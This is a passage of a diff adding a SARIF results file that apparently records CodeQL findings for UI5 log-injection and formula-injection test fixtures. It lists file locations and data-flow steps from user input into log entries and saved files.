"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 172 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 38 + } + }, + "message" : { + "text" : "{ type: \"int\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + }, + "region" : { + "startLine" : 13, + "startColumn" : 38, + "endColumn" : 56 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 175 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 25, + "startColumn" : 26, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "191c273ff0751536:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "req.url" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 13, + "endColumn" : 37 + } + }, + "message" : { + "text" : "url.par ... , true)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 9, + "endColumn" : 37 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 18 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 24 + } + }, + "message" : { + "text" : "q.query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "q.query.username" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 9, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 18, + "endColumn" : 45 + } + }, + "message" : { + "text" : "jQuery. ... (value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 25, + "startColumn" : 26, + "endColumn" : 32 + } + }, + "message" : { + "text" : "value1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 17, + "startColumn" : 38, + "endColumn" : 47 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "f32b0dcd4573d6a3:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 184 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 185 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 8, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 15, + "startColumn" : 29, + "endColumn" : 47 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 15, + "startColumn" : 21, + "endColumn" : 47 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 16, + "startColumn" : 50, + "endColumn" : 55 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 16, + "startColumn" : 43, + "endColumn" : 56 + } + }, + "message" : { + "text" : "String(value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 16, + "startColumn" : 33, + "endColumn" : 57 + } + }, + "message" : { + "text" : "encodeX ... value))" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 16, + "startColumn" : 21, + "endColumn" : 57 + } + }, + "message" : { + "text" : "sanitized" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 17, + "startColumn" : 38, + "endColumn" : 47 + } + }, + "message" : { + "text" : "sanitized" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 184 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 17, + "startColumn" : 34, + "endColumn" : 39 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "392fd43c95c7be9c:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 192 + }, + "region" : { + "startLine" : 6, + "startColumn" : 5, + "endLine" : 8, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 15, + "startColumn" : 25, + "endColumn" : 53 + } + }, + "message" : { + "text" : "oModel. ... input')" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 15, + "startColumn" : 17, + "endColumn" : 53 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 17, + "startColumn" : 34, + "endColumn" : 39 + } + }, + "message" : { + "text" : "input" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 192 + }, + "region" : { + "startLine" : 6, + "startColumn" : 5, + "endLine" : 8, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 16, + "startColumn" : 30, + "endColumn" : 35 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "27d08bf2c216b384:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 204 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 8, + "startColumn" : 11, + "endColumn" : 22 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 14, + "startColumn" : 21, + "endColumn" : 49 + } + }, + "message" : { + "text" : "oModel. ... input\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 14, + "startColumn" : 13, + "endColumn" : 49 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 16, + "startColumn" : 30, + "endColumn" : 35 + } + }, + "message" : { + "text" : "input" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 204 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 17, + "startColumn" : 34, + "endColumn" : 39 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "392fd43c95c7be9c:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 209 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 15, + "startColumn" : 25, + "endColumn" : 53 + } + }, + "message" : { + "text" : "oModel. ... input')" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 15, + "startColumn" : 17, + "endColumn" : 53 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 17, + "startColumn" : 34, + "endColumn" : 39 + } + }, + "message" : { + "text" : "input" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 209 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-formula-injection", + "rule" : { + "id" : "js/ui5-formula-injection", + "index" : 4, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The content of a saved file depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 145 + }, + "region" : { + "startLine" : 17, + "startColumn" : 27, + "endColumn" : 45 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "41899ff1a967017d:1", + "primaryLocationStartColumnFingerprint" : "10" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 150 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 146 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 145 + }, + "region" : { + "startLine" : 8, + "startColumn" : 23, + "endColumn" : 38 + } + }, + "message" : { + "text" : "{ type: \"int\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 145 + }, + "region" : { + "startLine" : 17, + "startColumn" : 27, + "endColumn" : 45 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 150 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-formula-injection", + "rule" : { + "id" : "js/ui5-formula-injection", + "index" : 4, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The content of a saved file depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 23, + "startColumn" : 27, + "endColumn" : 39 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "9afa5fd07ee36af6:1", + "primaryLocationStartColumnFingerprint" : "10" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 159 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 155 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 9, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 15, + "startColumn" : 29, + "endColumn" : 47 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 15, + "startColumn" : 21, + "endColumn" : 47 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 17, + "startColumn" : 53, + "endColumn" : 58 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 17, + "startColumn" : 46, + "endColumn" : 59 + } + }, + "message" : { + "text" : "String(value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 17, + "startColumn" : 36, + "endColumn" : 60 + } + }, + "message" : { + "text" : "encodeX ... value))" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 17, + "startColumn" : 21, + "endColumn" : 60 + } + }, + "message" : { + "text" : "xssSanitized" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 23, + "startColumn" : 27, + "endColumn" : 39 + } + }, + "message" : { + "text" : "xssSanitized" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 159 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-formula-injection", + "rule" : { + "id" : "js/ui5-formula-injection", + "index" : 4, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The content of a saved file depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + }, + "region" : { + "startLine" : 16, + "startColumn" : 23, + "endColumn" : 51 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e701acdf85af03b4:1", + "primaryLocationStartColumnFingerprint" : "10" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + 